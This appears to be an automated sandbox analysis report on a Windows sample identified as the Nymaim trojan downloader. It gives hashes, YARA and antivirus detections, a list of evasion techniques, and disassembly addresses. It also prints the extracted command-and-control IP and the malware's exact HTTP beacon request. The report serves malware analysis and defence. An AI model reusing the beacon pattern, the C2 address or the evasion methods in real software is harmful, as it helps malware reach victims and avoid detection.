Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565722
MD5:24fd69187bd9cb0bfbae4c051db9e658
SHA1:484e593d6f0410027ec108a670a0f2e4b112244a
SHA256:31dc48b6c89b00fffa7e3377584085558cc79bec167ba7143cc75915696369e7
Tags:exeuser-Bitsight
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 24FD69187BD9CB0BFBAE4C051DB9E658)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.file.exe.4940e67.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.3.file.exe.4a30000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.2.file.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.2.file.exe.400000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubGAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubHAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubDAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubConAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubRAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubEAvira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_Avira URL Cloud: Label: malware
                Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubbAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 0.3.file.exe.4a30000.0.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 34%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004035D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04943837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_04943837
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0495798E FindFirstFileExW,0_2_0495798E

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Malware configuration extractorIPs: 185.156.72.65
                Source: Joe Sandbox ViewIP Address: 185.156.72.65 185.156.72.65
                Source: Joe Sandbox ViewASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: unknownTCP traffic detected without corresponding DNS query: 185.156.72.65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubCon
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubD
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubE
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubG
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubH
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubf
                Source: file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubr

                E-Banking Fraud

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109400_2_00410940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3460_2_0041A346
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBC70_2_0040EBC7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D400_2_00403D40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E590_2_00415E59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6D00_2_0040B6D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EE00_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F700_2_00404F70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EF090_2_0040EF09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041572E0_2_0041572E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D34060_2_005D3406
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E44B50_2_005E44B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D68A40_2_005D68A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E8D690_2_004E8D69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00473D150_2_00473D15
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005C09360_2_005C0936
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E19340_2_005E1934
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E29200_2_005E2920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005745EF0_2_005745EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00471E5D0_2_00471E5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00486E740_2_00486E74
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004826C80_2_004826C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00527ED40_2_00527ED4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A9AC30_2_004A9AC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054BB720_2_0054BB72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00569F3C0_2_00569F3C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004863DE0_2_004863DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D13D70_2_004D13D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D83F10_2_005D83F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005DD7E10_2_005DD7E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061D3D30_2_0061D3D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494EE2E0_2_0494EE2E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_049559950_2_04955995
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494B9370_2_0494B937
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494F1700_2_0494F170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04950BA70_2_04950BA7
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A7A0 appears 35 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0494AA07 appears 35 times
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: file.exeStatic PE information: Section: ZLIB complexity 0.9952312234607219
                Source: file.exeStatic PE information: Section: iqkzmigc ZLIB complexity 0.9920429307357712
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04798464 CreateToolhelp32Snapshot,Module32First,0_2_04798464
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401970
                Source: C:\Users\user\Desktop\file.exeCommand line argument: nosub0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_004087E0
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 34%
                Source: file.exeString found in binary or memory: /add?substr=
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2008064 > 1048576
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: Raw size of iqkzmigc is bigger than: 0x100000 < 0x1a7e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iqkzmigc:EW;afatghvh:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1f3d28 should be: 0x1f5cd4
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iqkzmigc
                Source: file.exeStatic PE information: section name: afatghvh
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB02F push ebx; ret 0_2_006FB03E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB004 push edi; ret 0_2_006FB013
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB0CD push ecx; ret 0_2_006FB0DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA95C push edx; ret 0_2_006FA96B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB133 push edi; ret 0_2_006FB142
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA9FD push esi; ret 0_2_006FAA0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB1FD push edx; ret 0_2_006FB20C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA9D4 push ebx; ret 0_2_006FA9E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FAA5A push ebx; ret 0_2_006FAA69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FAADE push ebx; ret 0_2_006FAAED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB2A3 push eax; ret 0_2_006FB2C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB293 push ebx; ret 0_2_006FB2A2
